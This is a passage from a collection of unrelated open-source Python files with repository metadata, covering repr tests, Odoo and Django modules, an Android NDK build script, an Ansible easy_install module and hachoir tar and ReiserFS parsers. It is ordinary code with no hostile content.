self._verify(u'hyv\xe4', "'hyv\\xe4'" if PY2 else "'hyv\xe4'")
def test_ascii_bytes(self):
self._verify(b'ascii', "b'ascii'")
def test_non_ascii_bytes(self):
self._verify(b'non-\xe4scii', "b'non-\\xe4scii'")
def test_bytearray(self):
self._verify(bytearray(b'foo'), "bytearray(b'foo')")
def test_non_strings(self):
for inp in [1, -2.0, True, None, -2.0, (), [], {},
StrFails(), UnicodeFails()]:
self._verify(inp)
def test_failing_repr(self):
failing = ReprFails()
self._verify(failing, failing.unrepr)
def test_unicode_repr(self):
invalid = UnicodeRepr()
if JYTHON:
expected = 'Hyv\\xe4'
elif IRONPYTHON or PY3:
expected = u'Hyv\xe4'
else:
expected = invalid.unrepr # This is correct.
self._verify(invalid, expected)
def test_non_ascii_repr(self):
non_ascii = NonAsciiRepr()
if IRONPYTHON or PY3:
expected = u'Hyv\xe4'
else:
expected = 'Hyv\\xe4' # This is correct.
self._verify(non_ascii, expected)
def test_collections(self):
self._verify([u'foo', b'bar', 3], "['foo', b'bar', 3]")
self._verify([u'foo', b'b\xe4r', (u'x', b'y')], "['foo', b'b\\xe4r', ('x', b'y')]")
self._verify({u'x': b'\xe4'}, "{'x': b'\\xe4'}")
def test_dotdict(self):
self._verify(DotDict({u'x': b'\xe4'}), "{'x': b'\\xe4'}")
def test_recursive(self):
x = [1, 2]
x.append(x)
match = re.match(r'\[1, 2. <Recursion on list with id=\d+>\]', prepr(x))
assert_true(match is not None)
def test_split_big_collections(self):
self._verify(list(range(100)))
self._verify([u'Hello, world!'] * 10,
'[%s]' % ', '.join(["'Hello, world!'"] * 10))
self._verify(list(range(300)),
'[%s]' % ',\n '.join(str(i) for i in range(300)))
self._verify([u'Hello, world!'] * 30,
'[%s]' % ',\n '.join(["'Hello, world!'"] * 30))
class UnRepr(object):
error = 'This, of course, should never happen...'
@property
def unrepr(self):
return self.format(type(self).__name__, self.error)
@staticmethod
def format(name, error):
return "<Unrepresentable object %s. Error: %s>" % (name, error)
class UnicodeFails(UnRepr):
def __unicode__(self):
raise RuntimeError(self.error)
def __str__(self):
raise RuntimeError(self.error)
class StrFails(UnRepr):
def __unicode__(self):
raise UnicodeError()
def __str__(self):
raise RuntimeError(self.error)
class ReprFails(UnRepr):
def __repr__(self):
raise RuntimeError(self.error)
class UnicodeRepr(UnRepr):
def __init__(self):
try:
repr(self)
except UnicodeEncodeError as err:
self.error = 'UnicodeEncodeError: %s' % err
def __repr__(self):
return u'Hyv\xe4'
class NonAsciiRepr(UnRepr):
def __init__(self):
try:
repr(self)
except UnicodeEncodeError as err:
self.error = 'UnicodeEncodeError: %s' % err
def __repr__(self):
return 'Hyv\xe4'
if __name__ == '__main__':
unittest.main()
| apache-2.0 |
windedge/odoomrp-wip | stock_quant_manual_assign/wizard/assign_manual_quants.py | 9 | 3737 | # -*- coding: utf-8 -*-
##############################################################################
# For copyright and license notices, see __openerp__.py file in root directory
##############################################################################
from openerp import fields, models, api, exceptions, _
class AssignManualQuants(models.TransientModel):
_name = 'assign.manual.quants'
def lines_qty(self):
total_qty = 0
for line in self.quants_lines:
if line.selected:
total_qty += line.qty
return total_qty
@api.one
@api.constrains('quants_lines')
def check_qty(self):
if self.quants_lines:
total_qty = self.lines_qty()
move = self.env['stock.move'].browse(self.env.context['active_id'])
if total_qty > move.product_uom_qty:
raise exceptions.Warning(_('Error'),
_('Quantity is higher'
' than the needed one'))
@api.depends('quants_lines')
def get_move_qty(self):
move = self.env['stock.move'].browse(self.env.context['active_id'])
self.move_qty = move.product_uom_qty - self.lines_qty()
name = fields.Char(string='Name')
move_qty = fields.Float(string="Remaining qty", compute="get_move_qty")
quants_lines = fields.One2many('assign.manual.quants.lines',
'assign_wizard', string='Quants')
@api.multi
def assign_quants(self):
move = self.env['stock.move'].browse(self.env.context['active_id'])
move.picking_id.mapped('pack_operation_ids').unlink()
quants = []
for quant_id in move.reserved_quant_ids.ids:
move.write({'reserved_quant_ids': [[3, quant_id]]})
for line in self.quants_lines:
if line.selected:
quants.append([line.quant, line.qty])
self.pool['stock.quant'].quants_reserve(
self.env.cr, self.env.uid, quants, move, context=self.env.context)
return {}
@api.model
def default_get(self, var_fields):
move = self.env['stock.move'].browse(self.env.context['active_id'])
available_quants_ids = self.env['stock.quant'].search(
['|', ('location_id', '=', move.location_id.id),
('location_id', 'in', move.location_id.child_ids.ids),
('product_id', '=', move.product_id.id),
('qty', '>', 0),
('reservation_id', '=', False)])
available_quants = [{'quant': x.id} for x in available_quants_ids]
available_quants.extend(
{'quant': x.id,
'selected': True,
'qty': x.qty
} for x in move.reserved_quant_ids)
return {'quants_lines': available_quants}
class AssignManualQuantsLines(models.TransientModel):
_name = 'assign.manual.quants.lines'
_rec_name = 'quant'
@api.onchange('selected')
def onchange_selected(self):
if not self.selected:
self.qty = False
if self.selected and self.qty == 0:
quant_qty = self.quant.qty
remaining_qty = self.assign_wizard.move_qty
if quant_qty < remaining_qty:
self.qty = quant_qty
else:
self.qty = remaining_qty
assign_wizard = fields.Many2one('assign.manual.quants', string='Move',
required=True, ondelete="cascade")
quant = fields.Many2one('stock.quant', string="Quant", required=True,
ondelete='cascade')
qty = fields.Float(string='QTY')
selected = fields.Boolean(string="Select")
| agpl-3.0 |
wanmaple/MWFrameworkForCocosJs | frameworks/runtime-src/proj.android/build_native.py | 43 | 5988 | #!/usr/bin/python
'''
build_native.py
This script will copy resources to assets and build native code with NDK.
'''
import sys
import os, os.path
import shutil
from optparse import OptionParser
def get_num_of_cpu():
''' The build process can be accelerated by running multiple concurrent job processes using the -j-option.
'''
try:
platform = sys.platform
if platform == 'win32':
if 'NUMBER_OF_PROCESSORS' in os.environ:
return int(os.environ['NUMBER_OF_PROCESSORS'])
else:
return 1
else:
from numpy.distutils import cpuinfo
return cpuinfo.cpu._getNCPUs()
except Exception:
print "Can't know cpuinfo, use default 1 cpu"
return 1
def check_environment_variables():
''' Checking the environment NDK_ROOT, which will be used for building
'''
try:
NDK_ROOT = os.environ['NDK_ROOT']
except Exception:
print "NDK_ROOT not defined. Please define NDK_ROOT in your environment"
sys.exit(1)
return NDK_ROOT
def select_toolchain_version(ndk_root):
ret_version = "4.8"
version_file_path = os.path.join(ndk_root, "RELEASE.TXT")
try:
versionFile = open(version_file_path)
lines = versionFile.readlines()
versionFile.close()
version_num = None
version_char = None
pattern = r'^[a-zA-Z]+(\d+)(\w)'
for line in lines:
str_line = line.lstrip()
match = re.match(pattern, str_line)
if match:
version_num = int(match.group(1))
version_char = match.group(2)
break
if version_num is None:
print("Parse NDK version from file %s failed." % version_file_path)
else:
version_char = version_char.lower()
if version_num > 10 or (version_num == 10 and cmp(version_char, 'c') >= 0):
ret_version = "4.9"
except:
print("Parse NDK version from file %s failed." % version_file_path)
print("NDK_TOOLCHAIN_VERSION: %s" % ret_version)
if ret_version == "4.8":
print(
"Your application may crash when using c++ 11 regular expression with NDK_TOOLCHAIN_VERSION %s" % ret_version)
return ret_version
def do_build(cocos_root, ndk_root, app_android_root, ndk_build_param,sdk_root,build_mode):
ndk_path = os.path.join(ndk_root, "ndk-build")
ndk_toolchain_version = select_toolchain_version(ndk_root)
# windows should use ";" to seperate module paths
platform = sys.platform
if platform == 'win32':
ndk_module_path = 'NDK_MODULE_PATH=%s/..;%s;%s/external;%s/cocos NDK_TOOLCHAIN_VERSION=%s' % (cocos_root, cocos_root, cocos_root, cocos_root, ndk_toolchain_version)
else:
ndk_module_path = 'NDK_MODULE_PATH=%s/..:%s:%s/external:%s/cocos NDK_TOOLCHAIN_VERSION=%s' % (cocos_root, cocos_root, cocos_root, cocos_root, ndk_toolchain_version)
num_of_cpu = get_num_of_cpu()
if ndk_build_param == None:
command = '%s -j%d -C %s NDK_DEBUG=%d %s' % (ndk_path, num_of_cpu, app_android_root, build_mode=='debug', ndk_module_path)
else:
command = '%s -j%d -C %s NDK_DEBUG=%d %s %s' % (ndk_path, num_of_cpu, app_android_root, build_mode=='debug', ndk_build_param, ndk_module_path)
print command
if os.system(command) != 0:
raise Exception("Build dynamic library for project [ " + app_android_root + " ] fails!")
def copy_files(src, dst):
for item in os.listdir(src):
path = os.path.join(src, item)
# Android can not package the file that ends with ".gz"
if not item.startswith('.') and not item.endswith('.gz') and os.path.isfile(path):
shutil.copy(path, dst)
if os.path.isdir(path):
new_dst = os.path.join(dst, item)
os.mkdir(new_dst)
copy_files(path, new_dst)
def copy_resources(app_android_root):
# remove app_android_root/assets if it exists
assets_dir = os.path.join(app_android_root, "assets")
if os.path.isdir(assets_dir):
shutil.rmtree(assets_dir)
# copy resources
os.mkdir(assets_dir)
assets_res_dir = assets_dir + "/res";
assets_scripts_dir = assets_dir + "/src";
assets_jsb_dir = assets_dir + "/script";
os.mkdir(assets_res_dir);
os.mkdir(assets_scripts_dir);
os.mkdir(assets_jsb_dir);
shutil.copy(os.path.join(app_android_root, "../../../main.js"), assets_dir)
shutil.copy(os.path.join(app_android_root, "../../../project.json"), assets_dir)
resources_dir = os.path.join(app_android_root, "../../../res")
copy_files(resources_dir, assets_res_dir)
resources_dir = os.path.join(app_android_root, "../../../src")
copy_files(resources_dir, assets_scripts_dir)
resources_dir = os.path.join(app_android_root, "../../../frameworks/js-bindings/bindings/script")
copy_files(resources_dir, assets_jsb_dir)
def build(targets,ndk_build_param,build_mode):
ndk_root = check_environment_variables()
sdk_root = None
project_root = os.path.dirname(os.path.realpath(__file__))
cocos_root = os.path.join(project_root, "..", "..", "..", "frameworks/js-bindings/cocos2d-x")
print cocos_root
if build_mode is None:
build_mode = 'debug'
elif build_mode != 'release':
build_mode = 'debug'
copy_resources(project_root)
do_build(cocos_root, ndk_root, project_root,ndk_build_param,sdk_root,build_mode)
# -------------- main --------------
if __name__ == '__main__':
parser = OptionParser()
parser.add_option("-n", "--ndk", dest="ndk_build_param",
help='Parameter for ndk-build')
parser.add_option("-b", "--build", dest="build_mode",
help='The build mode for NDK project, debug or release')
(opts, args) = parser.parse_args()
try:
build(args, opts.ndk_build_param,opts.build_mode)
except Exception as e:
print e
sys.exit(1)
| apache-2.0 |
richardnpaul/FWL-Website | lib/python2.7/site-packages/django/core/files/uploadedfile.py | 223 | 4156 | """
Classes representing uploaded files.
"""
import os
from io import BytesIO
from django.conf import settings
from django.core.files.base import File
from django.core.files import temp as tempfile
from django.utils.encoding import force_str
__all__ = ('UploadedFile', 'TemporaryUploadedFile', 'InMemoryUploadedFile',
'SimpleUploadedFile')
class UploadedFile(File):
"""
A abstract uploaded file (``TemporaryUploadedFile`` and
``InMemoryUploadedFile`` are the built-in concrete subclasses).
An ``UploadedFile`` object behaves somewhat like a file object and
represents some file data that the user submitted with a form.
"""
DEFAULT_CHUNK_SIZE = 64 * 2**10
def __init__(self, file=None, name=None, content_type=None, size=None, charset=None):
super(UploadedFile, self).__init__(file, name)
self.size = size
self.content_type = content_type
self.charset = charset
def __repr__(self):
return force_str("<%s: %s (%s)>" % (
self.__class__.__name__, self.name, self.content_type))
def _get_name(self):
return self._name
def _set_name(self, name):
# Sanitize the file name so that it can't be dangerous.
if name is not None:
# Just use the basename of the file -- anything else is dangerous.
name = os.path.basename(name)
# File names longer than 255 characters can cause problems on older OSes.
if len(name) > 255:
name, ext = os.path.splitext(name)
name = name[:255 - len(ext)] + ext
self._name = name
name = property(_get_name, _set_name)
class TemporaryUploadedFile(UploadedFile):
"""
A file uploaded to a temporary location (i.e. stream-to-disk).
"""
def __init__(self, name, content_type, size, charset):
if settings.FILE_UPLOAD_TEMP_DIR:
file = tempfile.NamedTemporaryFile(suffix='.upload',
dir=settings.FILE_UPLOAD_TEMP_DIR)
else:
file = tempfile.NamedTemporaryFile(suffix='.upload')
super(TemporaryUploadedFile, self).__init__(file, name, content_type, size, charset)
def temporary_file_path(self):
"""
Returns the full path of this file.
"""
return self.file.name
def close(self):
try:
return self.file.close()
except OSError as e:
if e.errno != 2:
# Means the file was moved or deleted before the tempfile
# could unlink it. Still sets self.file.close_called and
# calls self.file.file.close() before the exception
raise
class InMemoryUploadedFile(UploadedFile):
"""
A file uploaded into memory (i.e. stream-to-memory).
"""
def __init__(self, file, field_name, name, content_type, size, charset):
super(InMemoryUploadedFile, self).__init__(file, name, content_type, size, charset)
self.field_name = field_name
def open(self, mode=None):
self.file.seek(0)
def close(self):
pass
def chunks(self, chunk_size=None):
self.file.seek(0)
yield self.read()
def multiple_chunks(self, chunk_size=None):
# Since it's in memory, we'll never have multiple chunks.
return False
class SimpleUploadedFile(InMemoryUploadedFile):
"""
A simple representation of a file, which just has content, size, and a name.
"""
def __init__(self, name, content, content_type='text/plain'):
content = content or b''
super(SimpleUploadedFile, self).__init__(BytesIO(content), None, name,
content_type, len(content), None)
def from_dict(cls, file_dict):
"""
Creates a SimpleUploadedFile object from
a dictionary object with the following keys:
- filename
- content-type
- content
"""
return cls(file_dict['filename'],
file_dict['content'],
file_dict.get('content-type', 'text/plain'))
from_dict = classmethod(from_dict)
| gpl-3.0 |
jarshwah/django | django/db/backends/oracle/compiler.py | 59 | 2044 | from django.db.models.sql import compiler
class SQLCompiler(compiler.SQLCompiler):
def as_sql(self, with_limits=True, with_col_aliases=False, subquery=False):
"""
Creates the SQL for this query. Returns the SQL string and list
of parameters. This is overridden from the original Query class
to handle the additional SQL Oracle requires to emulate LIMIT
and OFFSET.
If 'with_limits' is False, any limit/offset information is not
included in the query.
"""
# The `do_offset` flag indicates whether we need to construct
# the SQL needed to use limit/offset with Oracle.
do_offset = with_limits and (self.query.high_mark is not None or self.query.low_mark)
if not do_offset:
sql, params = super(SQLCompiler, self).as_sql(
with_limits=False,
with_col_aliases=with_col_aliases,
subquery=subquery,
)
else:
sql, params = super(SQLCompiler, self).as_sql(
with_limits=False,
with_col_aliases=True,
subquery=subquery,
)
# Wrap the base query in an outer SELECT * with boundaries on
# the "_RN" column. This is the canonical way to emulate LIMIT
# and OFFSET on Oracle.
high_where = ''
if self.query.high_mark is not None:
high_where = 'WHERE ROWNUM <= %d' % (self.query.high_mark,)
sql = (
'SELECT * FROM (SELECT "_SUB".*, ROWNUM AS "_RN" FROM (%s) '
'"_SUB" %s) WHERE "_RN" > %d' % (sql, high_where, self.query.low_mark)
)
return sql, params
class SQLInsertCompiler(compiler.SQLInsertCompiler, SQLCompiler):
pass
class SQLDeleteCompiler(compiler.SQLDeleteCompiler, SQLCompiler):
pass
class SQLUpdateCompiler(compiler.SQLUpdateCompiler, SQLCompiler):
pass
class SQLAggregateCompiler(compiler.SQLAggregateCompiler, SQLCompiler):
pass
| bsd-3-clause |
edx/course-discovery | course_discovery/apps/api/v1/tests/test_views/test_program_types.py | 1 | 1862 | from django.urls import reverse
from course_discovery.apps.api.v1.tests.test_views.mixins import APITestCase, SerializationMixin
from course_discovery.apps.core.tests.factories import USER_PASSWORD, UserFactory
from course_discovery.apps.course_metadata.models import ProgramType
from course_discovery.apps.course_metadata.tests.factories import ProgramTypeFactory
class ProgramTypeViewSetTests(SerializationMixin, APITestCase):
list_path = reverse('api:v1:program_type-list')
def setUp(self):
super().setUp()
self.user = UserFactory(is_staff=True, is_superuser=True)
self.client.login(username=self.user.username, password=USER_PASSWORD)
def test_authentication(self):
""" Verify the endpoint requires the user to be authenticated. """
response = self.client.get(self.list_path)
assert response.status_code == 200
self.client.logout()
response = self.client.get(self.list_path)
assert response.status_code == 401
def test_list(self):
""" Verify the endpoint returns a list of all program types. """
ProgramTypeFactory.create_batch(4)
expected = ProgramType.objects.all()
with self.assertNumQueries(6):
response = self.client.get(self.list_path)
assert response.status_code == 200
assert response.data['results'] == self.serialize_program_type(expected, many=True)
def test_retrieve(self):
""" The request should return details for a single program type. """
program_type = ProgramTypeFactory()
url = reverse('api:v1:program_type-detail', kwargs={'slug': program_type.slug})
with self.assertNumQueries(5):
response = self.client.get(url)
assert response.status_code == 200
assert response.data == self.serialize_program_type(program_type)
| agpl-3.0 |
vincent-noel/libSigNetSim | libsignetsim/numl/tests/test_example_notes.py | 1 | 1937 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2014-2017 Vincent Noel (vincent.noel@butantan.gov.br)
#
# This file is part of libSigNetSim.
#
# libSigNetSim is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# libSigNetSim is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with libSigNetSim. If not, see <http://www.gnu.org/licenses/>.
"""
This file is a simple example of reading and writing a basic NuML doc
"""
from __future__ import print_function
import libnuml
from libnuml import readNUMLFromFile, writeNUML, writeNUMLToString, XMLNode, NUMLDocument
from libsignetsim import Settings
from unittest import TestCase
from os.path import join, dirname
from six.moves import reload_module
class TestExampleNotes(TestCase):
""" Tests high level functions """
def testExampleNotes(self):
print("\n\n")
numl_doc = NUMLDocument()
reload_module(libnuml)
time_term = numl_doc.createOntologyTerm()
time_term.setId("time_term")
time_term.setTerm("time")
time_term.setSourceTermId("SBO:0000345")
time_term.setOntologyURI("http://www.ebi.ac.uk/sbo/")
notes = "<notes><body xmlns=\"http://www.w3.org/1999/xhtml\"><p>This needs to be noted</p></body></notes>"
xml_notes = XMLNode.convertStringToXMLNode(notes)
numl_doc.setNotes(xml_notes)
numl_doc_string = writeNUMLToString(numl_doc)
numl_doc_filename = join(Settings.tempDirectory, "example_notes.xml")
writeNUML(numl_doc, numl_doc_filename)
numl_doc_copy_file = readNUMLFromFile(numl_doc_filename)
| gpl-3.0 |
47lining/ansible-modules-core | packaging/language/easy_install.py | 73 | 6261 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2012, Matt Wright <matt@nobien.net>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
import tempfile
import os.path
DOCUMENTATION = '''
---
module: easy_install
short_description: Installs Python libraries
description:
- Installs Python libraries, optionally in a I(virtualenv)
version_added: "0.7"
options:
name:
description:
- A Python library name
required: true
default: null
aliases: []
virtualenv:
description:
- an optional I(virtualenv) directory path to install into. If the
I(virtualenv) does not exist, it is created automatically
required: false
default: null
virtualenv_site_packages:
version_added: "1.1"
description:
- Whether the virtual environment will inherit packages from the
global site-packages directory. Note that if this setting is
changed on an already existing virtual environment it will not
have any effect, the environment must be deleted and newly
created.
required: false
default: "no"
choices: [ "yes", "no" ]
virtualenv_command:
version_added: "1.1"
description:
- The command to create the virtual environment with. For example
C(pyvenv), C(virtualenv), C(virtualenv2).
required: false
default: virtualenv
executable:
description:
- The explicit executable or a pathname to the executable to be used to
run easy_install for a specific version of Python installed in the
system. For example C(easy_install-3.3), if there are both Python 2.7
and 3.3 installations in the system and you want to run easy_install
for the Python 3.3 installation.
version_added: "1.3"
required: false
default: null
notes:
- Please note that the M(easy_install) module can only install Python
libraries. Thus this module is not able to remove libraries. It is
generally recommended to use the M(pip) module which you can first install
using M(easy_install).
- Also note that I(virtualenv) must be installed on the remote host if the
C(virtualenv) parameter is specified.
requirements: [ "virtualenv" ]
author: Matt Wright
'''
EXAMPLES = '''
# Examples from Ansible Playbooks
- easy_install: name=pip
# Install Bottle into the specified virtualenv.
- easy_install: name=bottle virtualenv=/webapps/myapp/venv
'''
def _is_package_installed(module, name, easy_install):
cmd = '%s --dry-run %s' % (easy_install, name)
rc, status_stdout, status_stderr = module.run_command(cmd)
return not ('Reading' in status_stdout or 'Downloading' in status_stdout)
def _get_easy_install(module, env=None, executable=None):
candidate_easy_inst_basenames = ['easy_install']
easy_install = None
if executable is not None:
if os.path.isabs(executable):
easy_install = executable
else:
candidate_easy_inst_basenames.insert(0, executable)
if easy_install is None:
if env is None:
opt_dirs = []
else:
# Try easy_install with the virtualenv directory first.
opt_dirs = ['%s/bin' % env]
for basename in candidate_easy_inst_basenames:
easy_install = module.get_bin_path(basename, False, opt_dirs)
if easy_install is not None:
break
# easy_install should have been found by now. The final call to
# get_bin_path will trigger fail_json.
if easy_install is None:
basename = candidate_easy_inst_basenames[0]
easy_install = module.get_bin_path(basename, True, opt_dirs)
return easy_install
def main():
arg_spec = dict(
name=dict(required=True),
virtualenv=dict(default=None, required=False),
virtualenv_site_packages=dict(default='no', type='bool'),
virtualenv_command=dict(default='virtualenv', required=False),
executable=dict(default='easy_install', required=False),
)
module = AnsibleModule(argument_spec=arg_spec, supports_check_mode=True)
name = module.params['name']
env = module.params['virtualenv']
executable = module.params['executable']
site_packages = module.params['virtualenv_site_packages']
virtualenv_command = module.params['virtualenv_command']
rc = 0
err = ''
out = ''
if env:
virtualenv = module.get_bin_path(virtualenv_command, True)
if not os.path.exists(os.path.join(env, 'bin', 'activate')):
if module.check_mode:
module.exit_json(changed=True)
command = '%s %s' % (virtualenv, env)
if site_packages:
command += ' --system-site-packages'
cwd = tempfile.gettempdir()
rc_venv, out_venv, err_venv = module.run_command(command, cwd=cwd)
rc += rc_venv
out += out_venv
err += err_venv
easy_install = _get_easy_install(module, env, executable)
cmd = None
changed = False
installed = _is_package_installed(module, name, easy_install)
if not installed:
if module.check_mode:
module.exit_json(changed=True)
cmd = '%s %s' % (easy_install, name)
rc_easy_inst, out_easy_inst, err_easy_inst = module.run_command(cmd)
rc += rc_easy_inst
out += out_easy_inst
err += err_easy_inst
changed = True
if rc != 0:
module.fail_json(msg=err, cmd=cmd)
module.exit_json(changed=changed, binary=easy_install,
name=name, virtualenv=env)
# import module snippets
from ansible.module_utils.basic import *
main()
| gpl-3.0 |
Cl3MM/metagoofil | hachoir_parser/archive/tar.py | 95 | 4443 | """
Tar archive parser.
Author: Victor Stinner
"""
from hachoir_parser import Parser
from hachoir_core.field import (FieldSet,
Enum, UInt8, SubFile, String, NullBytes)
from hachoir_core.tools import humanFilesize, paddingSize, timestampUNIX
from hachoir_core.endian import BIG_ENDIAN
import re
class FileEntry(FieldSet):
type_name = {
# 48 is "0", 49 is "1", ...
0: u"Normal disk file (old format)",
48: u"Normal disk file",
49: u"Link to previously dumped file",
50: u"Symbolic link",
51: u"Character special file",
52: u"Block special file",
53: u"Directory",
54: u"FIFO special file",
55: u"Contiguous file"
}
def getOctal(self, name):
return self.octal2int(self[name].value)
def getDatetime(self):
"""
Create modification date as Unicode string, may raise ValueError.
"""
timestamp = self.getOctal("mtime")
return timestampUNIX(timestamp)
def createFields(self):
yield String(self, "name", 100, "Name", strip="\0", charset="ISO-8859-1")
yield String(self, "mode", 8, "Mode", strip=" \0", charset="ASCII")
yield String(self, "uid", 8, "User ID", strip=" \0", charset="ASCII")
yield String(self, "gid", 8, "Group ID", strip=" \0", charset="ASCII")
yield String(self, "size", 12, "Size", strip=" \0", charset="ASCII")
yield String(self, "mtime", 12, "Modification time", strip=" \0", charset="ASCII")
yield String(self, "check_sum", 8, "Check sum", strip=" \0", charset="ASCII")
yield Enum(UInt8(self, "type", "Type"), self.type_name)
yield String(self, "lname", 100, "Link name", strip=" \0", charset="ISO-8859-1")
yield String(self, "magic", 8, "Magic", strip=" \0", charset="ASCII")
yield String(self, "uname", 32, "User name", strip=" \0", charset="ISO-8859-1")
yield String(self, "gname", 32, "Group name", strip=" \0", charset="ISO-8859-1")
yield String(self, "devmajor", 8, "Dev major", strip=" \0", charset="ASCII")
yield String(self, "devminor", 8, "Dev minor", strip=" \0", charset="ASCII")
yield NullBytes(self, "padding", 167, "Padding (zero)")
filesize = self.getOctal("size")
if filesize:
yield SubFile(self, "content", filesize, filename=self["name"].value)
size = paddingSize(self.current_size//8, 512)
if size:
yield NullBytes(self, "padding_end", size, "Padding (512 align)")
def convertOctal(self, chunk):
return self.octal2int(chunk.value)
def isEmpty(self):
return self["name"].value == ""
def octal2int(self, text):
try:
return int(text, 8)
except ValueError:
return 0
def createDescription(self):
if self.isEmpty():
desc = "(terminator, empty header)"
else:
filename = self["name"].value
filesize = humanFilesize(self.getOctal("size"))
desc = "(%s: %s, %s)" % \
(filename, self["type"].display, filesize)
return "Tar File " + desc
class TarFile(Parser):
endian = BIG_ENDIAN
PARSER_TAGS = {
"id": "tar",
"category": "archive",
"file_ext": ("tar",),
"mime": (u"application/x-tar", u"application/x-gtar"),
"min_size": 512*8,
"magic": (("ustar \0", 257*8),),
"subfile": "skip",
"description": "TAR archive",
}
_sign = re.compile("ustar *\0|[ \0]*$")
def validate(self):
if not self._sign.match(self.stream.readBytes(257*8, 8)):
return "Invalid magic number"
if self[0].name == "terminator":
return "Don't contain any file"
try:
int(self["file[0]/uid"].value, 8)
int(self["file[0]/gid"].value, 8)
int(self["file[0]/size"].value, 8)
except ValueError:
return "Invalid file size"
return True
def createFields(self):
while not self.eof:
field = FileEntry(self, "file[]")
if field.isEmpty():
yield NullBytes(self, "terminator", 512)
break
yield field
if self.current_size < self._size:
yield self.seekBit(self._size, "end")
def createContentSize(self):
return self["terminator"].address + self["terminator"].size
| gpl-2.0 |
coderbone/SickRage-alt | lib/hachoir_parser/file_system/reiser_fs.py | 74 | 6910 | """
ReiserFS file system version 3 parser (other version have not been tested).
Author: Frederic Weisbecker
Creation date: 8 december 2006
Sources:
- http://p-nand-q.com/download/rfstool/reiserfs_docs.html
- http://homes.cerias.purdue.edu/~florian/reiser/reiserfs.php
- file://usr/src/linux-2.6.16.19/include/linux/reiserfs_fs.h
NOTES:
The most part of the description of the structures, their fields and their
comments decribed here comes from the file include/linux/reiserfs_fs.h
- written by Hans reiser - located in the Linux kernel 2.6.16.19 and from
the Reiserfs explanations in
http://p-nand-q.com/download/rfstool/reiserfs_docs.html written by Gerson
Kurz.
"""
from hachoir_parser import Parser
from hachoir_core.field import (FieldSet, Enum,
UInt16, UInt32, String, RawBytes, NullBytes, SeekableFieldSet, Bit)
from hachoir_core.endian import LITTLE_ENDIAN
class BlockState(Bit):
"""The state (used/free) of a ReiserFs Block"""
STATE={
True : "used",
False : "free"
}
block_nb = 0
def __init__(self, parent, name, nb_block):
"""@param nb_block: Number of the block concerned"""
Bit.__init__(self, parent, name)
self.block_nb = self.__class__.block_nb
self.__class__.block_nb += 1
def createDescription(self):
return "State of the block %d" % self.block_nb
def createDisplay(self):
return self.STATE[Bit.createValue(self)]
class BitmapBlock(SeekableFieldSet):
""" The bitmap blocks are Reiserfs blocks where each byte contains
the state of 8 blocks in the filesystem. So each bit will describe
the state of a block to tell if it is used or not.
"""
def createFields(self):
block_size=self["/superblock/blocksize"].value
for i in xrange(0, block_size * 8):
yield BlockState(self, "block[]", i)
class BitmapBlockGroup(SeekableFieldSet):
"""The group that manages the Bitmap Blocks"""
def createFields(self):
block_size=self["/superblock/blocksize"].value
nb_bitmap_block = self["/superblock/bmap_nr"].value
# Position of the first bitmap block
self.seekByte(REISER_FS.SUPERBLOCK_OFFSET + block_size, relative=False)
yield BitmapBlock(self, "BitmapBlock[]", "Bitmap blocks tells for each block if it is used")
# The other bitmap blocks
for i in xrange(1, nb_bitmap_block):
self.seekByte( (block_size**2) * 8 * i, relative=False)
yield BitmapBlock(self, "BitmapBlock[]", "Bitmap blocks tells for each block if it is used")
class Journal_params(FieldSet):
static_size = 32*8
def createFields(self):
yield UInt32(self, "1st_block", "Journal 1st block number")
yield UInt32(self, "dev", "Journal device number")
yield UInt32(self, "size", "Size of the journal")
yield UInt32(self, "trans_max", "Max number of blocks in a transaction")
#TODO: Must be explained: it was sb_journal_block_count
yield UInt32(self, "magic", "Random value made on fs creation.")
yield UInt32(self, "max_batch", "Max number of blocks to batch into a trans")
yield UInt32(self, "max_commit_age", "In seconds, how old can an async commit be")
yield UInt32(self, "max_trans_age", "In seconds, how old can a transaction be")
def createDescription(self):
return "Parameters of the journal"
class SuperBlock(FieldSet):
#static_size = 204*8
UMOUNT_STATE = { 1: "unmounted", 2: "not unmounted" }
HASH_FUNCTIONS = {
0: "UNSET_HASH",
1: "TEA_HASH",
2: "YURA_HASH",
3: "R5_HASH"
}
def createFields(self):
#TODO: This structure is normally divided in two parts:
# _reiserfs_super_block_v1
# _reiserfs_super_block
# It will be divided later to easily support older version of the first part
yield UInt32(self, "block_count", "Number of blocks")
yield UInt32(self, "free_blocks", "Number of free blocks")
yield UInt32(self, "root_block", "Root block number")
yield Journal_params(self, "Journal parameters")
yield UInt16(self, "blocksize", "Size of a block")
yield UInt16(self, "oid_maxsize", "Max size of object id array")
yield UInt16(self, "oid_cursize", "Current size of object id array")
yield Enum(UInt16(self, "umount_state", "Filesystem umounted or not"), self.UMOUNT_STATE)
yield String(self, "magic", 10, "Magic string", strip="\0")
#TODO: change the type of s_fs_state in Enum to have more details about this fsck state
yield UInt16(self, "fs_state", "Rebuilding phase of fsck ")
yield Enum(UInt32(self, "hash_function", "Hash function to sort names in a directory"), self.HASH_FUNCTIONS)
yield UInt16(self, "tree_height", "Height of disk tree")
yield UInt16(self, "bmap_nr", "Amount of bitmap blocks needed to address each block of file system")
#TODO: find a good description for this field
yield UInt16(self, "version", "Field only reliable on filesystem with non-standard journal")
yield UInt16(self, "reserved_for_journal", "Size in blocks of journal area on main device")
#TODO: same as above
yield UInt32(self, "inode_generation", "No description")
#TODO: same as above and should be an enum field
yield UInt32(self, "flags", "No description")
#TODO: Create a special Type to format this id
yield RawBytes(self, "uuid", 16, "Filesystem unique identifier")
yield String(self, "label", 16, "Filesystem volume label", strip="\0")
